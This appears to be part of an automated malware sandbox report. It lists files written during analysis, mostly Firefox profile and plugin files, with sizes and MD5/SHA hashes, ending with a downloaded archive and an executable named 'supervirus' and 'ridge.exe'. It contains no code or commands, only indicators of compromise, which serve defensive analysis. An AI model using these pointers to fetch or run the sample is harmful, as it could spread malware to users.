13KB

MD5
60c604bebb951063315ca9ec7a75bffe

SHA1
04404743c8c52784e5d1e7d0597f7a2ee7e5525d

SHA256
15e9ca8ebb373a65369b28f20d18e46f8e8d05df1d4ce0c300f3f7a7c36a439c

SHA512
4830d43e0dff0afb6d7aac4f73aa96ff5f01b2ab4e98c3363f77b085ec3b304be33d3a146cf575f4390db3f8dcd3e1c08cf0ad6d30c378997414100f07477977

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize
997KB

MD5
fe3355639648c417e8307c6d051e3e37

SHA1
f54602d4b4778da21bc97c7238fc66aa68c8ee34

SHA256
1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

SHA512
8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
Filesize
7KB

MD5
bfbf39db2124dbacf55a580cf73631bd

SHA1
09d4051b4ee069a9ae599866d722ac4dd2327fa2

SHA256
175395af9614271bba6a84d2714f02c80b19790de23a950e4667f2032b19bb03

SHA512
47f95f5f057f23d7c00b7acbe09106a8b2f48d9eea5e878c15b95f53a6fa920d7a0632efa5acaca7bf6b7dffe8a86d8d39e6dbca35e2e003e3c45b4f65ab1b4b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
Filesize
6KB

MD5
0977713a300faa00c55a4da4e4835edb

SHA1
8ff4bd0d02d965ee998ce55f7c4da9814d217b5e

SHA256
8a6f28341984bb3ee0aa003c908542eb3558af2bc0955b26bfa3f1657d19c762

SHA512
9b4ed131b62e0e020b991c725f0d4168ac1c59f5434f22c245a019aca4542d3773e395f9611b2861e894a8de95d5bb7b37349f5819518d6eda5c1d0de9fce65e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
Filesize
7KB

MD5
2ac6d06661e84b6b3b78c31ba8dd3c5e

SHA1
b544280c791ae05a4b38dcec08fe9b237b259d96

SHA256
ab8e0b18dbf0a4e2c989bca83a6475dbc937baf6bf73a582d02bfdaa90c61cb3

SHA512
86be17054d71bceba516d635ea2b2725452fc7733b3a9f8865795224ca0cfad264c5e4382f0f9024a1f81777d8c23b7ebe3d64c9d56a882043098f6e3d542d91

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs-1.js
Filesize
9KB

MD5
861c8bf781c5393014d9fbafa4a23c94

SHA1
c68012f59a47b28406436289ec0e620804223aa6

SHA256
e77db40aad68734ad236b705146d1d34f55c29d777d958411afcbff4e17cd4be

SHA512
21d2ce2210997f753c4e3f343c708ade7a698160820994e9ceb083737831da0a124447219e34d1c2bd3b540fba96664033ad3ea43b22c0316da78d73f80320da

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
Filesize
6KB

MD5
125c6aeeb99ff1b2b7157d60e93c0b3a

SHA1
7f75b98dcec4773cb6bc63603e3a08df9658f07e

SHA256
ce50332ee1d7ba8e501fc4b8e486193c5f47cbc012675b417317e3cdab372498

SHA512
cf8e8665c9da1c22b0e825cc2cdad0f77b1109cd49ed2fab5951943bfa08d71147b6ee2e71f5d25187c5bbd89ee0303a58d8bd319ed6657d852e412d58682aba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
Filesize
8KB

MD5
18ed20d5c9cd1af1a5e9b3d416f30f36

SHA1
18d22223d8b3a4c31cc5bbe7d366fb988f04cd1b

SHA256
9f16ac7b15b9f856595ea702544e141e63fd3b1d6ca76c95caaaadb76d5f920d

SHA512
e9ca5e5fb260a4efc5618f9d3d7a01b3c21cc1d80d0e587acc41990dbae8cae991d505df3c53a8ddeb39dc2c99dcc297cb51bb8b41125333240e0196e5479313

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\prefs.js
Filesize
8KB

MD5
de228ced4830b114e4975dcc2009d12e

SHA1
9c5ed637434260ece4bfa18209508cf79c9c705e

SHA256
5feebb4669fe726be15da3bb6536f3faea140ce6246847bd3eed783a19a4ed56

SHA512
d913d418df3650c0e98cba7901406cdbac17a4aa7d8697e8b4919284366fcd827709cb7a4b9e9fe5b3c56f972673abc5a9dd5a5ab6a956989d12262e7b3c13c8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
53e53663adc357e7e7e6d00fe4e189b5

SHA1
363abbf6a3f696283c1692449e1734d7d885ef9e

SHA256
2ed3639dbc1110fad099513e00352b2e1f7f9bb32cc5c1f49a3a61f5e4561856

SHA512
33f43ea5842b9d66c93176f92d7bb79052bf855958f39485da7af1a536ee9ac2f24396d8454b9f83ea37a882b039be8593070468437743b8da088e7b59b1c4c5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
1KB

MD5
954a73a3a8776161e9c80a955788f76e

SHA1
817676ab065219f9880e501a1494e5ac13163917

SHA256
7a6103b8ea1c11a2ef455e8c75554508f7d69821bcc51d96ba4327f8e0f6fb79

SHA512
ceca2d84a4ddf14e3608732473d77509fbc14a332473c48a2f464b9c3d42ace5efc5ddffb608ecf86966f104406e8cb386a70b5c61627910de131c6a5eb7cf19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
80b6fe4794b4c821eb4ce8d64eed762e

SHA1
76e0bc2bf9df38f3bbba4fe71ee3881fa7be862b

SHA256
470ab6fff76397483a6715a8e2d1578f790af6d5af469154181200263394c15e

SHA512
88667cf794552423dd3dadba4e751fc762aaa5a75ca194da4c0757ce442701a2ceaee45ae5ab202e76cf5c1fb353debd2716fb01c1b55fd567095f55b260b74f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
fd4085c72db721c872a09d74232f6b26

SHA1
64dd3cbe3b7c019023e94742e0615739f722dc9d

SHA256
2fecac1ae59598decd0b928cd34017acb833b7e6be758d7bf663b6dacbba3c1f

SHA512
a1256dd954ba62a025867643b99e3f53b0047af4e7cf019f00a71c2b7c0b754e28e93bf522bd80dc89e77884d10964e3b31ba91936a551e293ca142ec7eb98b1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
3a23c8cd2b3e3ffde7b441d8720bf316

SHA1
db1b599656fe2cd9c4968b6787951485daeacee8

SHA256
b8c38985dd4114133dd0d4bf8a2695cbf0ab4c128c7c415ccf08da9a27f90e4d

SHA512
7e8a35e87ada4b52f2984dbc83a0b2d8eb99c28bcd08e9c7c5a899a30324dfd5bc7e125b771eb2bd92daf5397eb542b331635b6f32145882a521d80ed77d358b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
2KB

MD5
ae58fef14a57154fd210b4d55bf499a4

SHA1
af37a79a44d2b3ff929ab0ed3ba697927041ddc7

SHA256
9fe4cf58fce7d7f169bac615dca26c0548c58e07c23e093c360d5feca9a030b6

SHA512
96176f07aacf961b85b9070b06af3cb76cf4e2daf4b0fa041723d99f42533eb0a543c74b4f0ada0eec08e220d43acfea9a82d2ddc7719b4f337b8f46fa5b8a66

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
7eaab5c8d6c05ed8df295b158695470d

SHA1
78fa59b34bb512feb22deee7de7c4a4c1025b13b

SHA256
f74e8e55d3148c80bef17b2640c337480a09bcb6e1a2ddc68ff03e4a12b87efb

SHA512
29b82dc545786f7a5ff0119a972694bdaaa9e2bbefc0bd1d2aae62f941ec3b897cd8f514d5a87b7db7893f1eec68e9a4caf64533f067e397a4b56f5a39fb18d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
7c9bb66bcf4f9ec637cdefcf7aeb8ced

SHA1
a49484b6c1f6cd4355024a8a53a0516a3025ba5c

SHA256
60248fa1093aa3dc149ab7ae6cc01c64bef21a6ab7734b798bb2d03de27acf49

SHA512
f1f0e867fb68d2b738a68a869979ef5a5f94d299d4298fbe1463edb66623c41856ac609104e6cc82a464d6e1e7b5a9d460825f1cc629952545316a669d37490a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
8f87c7d6bb3e751e3edd7790af8a5b80

SHA1
ea437ecbc8de3d3f27595dafee05c777684dbdf9

SHA256
39262169af35252c546912066433d073cd02cb53398e2d4b85bb82b470d560f8

SHA512
df971fba21d97d4a58b4d3058b9d96d31bbe23e295027a6d6caae1d44099b5367e86f0a2b8a598cd59cea22770e4099f6735f8a448e11c6601223265b01d4b92

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\sessionstore-backups\recovery.jsonlz4
Filesize
3KB

MD5
4d398703860cd0e9e329ad3eb26e176a

SHA1
210f7164732d216eaf512dcaa6f18edd7f996261

SHA256
a0aafc13e7c64d9d21218b1c0ffcdc5c73aa92b4f94532008dfa4caa4f405602

SHA512
5c4cc96e706a19859fef51a63e7d590f04ea0db6c85bf32f4df6d6753dd2721547456612c8c2e6148a73e0abbe7010ae6906d0521aec48ec2ac588b67c01559d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\storage\default\https+++gamejolt.com\idb\3619099707vealluiddoamt-es-cbir.sqlite
Filesize
48KB

MD5
377523f3659afbec75d8e931ca775b70

SHA1
3611471e871943c611c09705732e894f66e6cc17

SHA256
b32712aa6bc766c01108c39770fddaf2eee4dfad143bfe065e04d8e9401cd311

SHA512
4903efc2ae6f76da8203cb5828a4fa10cfa43cdf81f354951140033356a2e172766a41d8f18a2cc3f495bc7fc4e4a3fbcc6b7c5f4df760bcf861ba8db629c64d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kvgg58fx.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize
2.0MB

MD5
546a12bebccb32dac5cca3214be7914f

SHA1
744e3cd77189a70871739b4d7320f90ec91bd05f

SHA256
cc767a1ebc6dc79d1626c8c71daa8a6cc8d6c98aee0744ed78feb2f78a5322e9

SHA512
d06aa4b064be53d7af12e9723a88adf9753ab31153149e63200cd08595f91a17a3b5a475265deaf64a04be1c124dc3126536fc390518071c4df766f9d636b687

Download Submit
C:\Users\Admin\Downloads\supervirus.0m0wYdWT.zip.part
Filesize
100KB

MD5
426ff666b84f19c11b78bc89ce233362

SHA1
9971d71239b7ceab1c1553a437fab5442ea05df3

SHA256
c81cd237399790fbe008343a0defd701428bbdf072e17304e2e6179d701f01e0

SHA512
1cffab7e3f7f78132d4ad9ff158ce4e704b60393a2c2e20ad00694df6845bfa6bad188384cac8a275964131e5f0e75aab19edc403f4f43f98403bac6875a8ebd

Download Submit
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
Filesize
116KB

MD5
5ed4728caa339c2a7479102f0c04c087

SHA1
20cd453fcac9d9960b0076715d985a55784a6b53

SHA256
7160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c

SHA512
a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865

Download Submit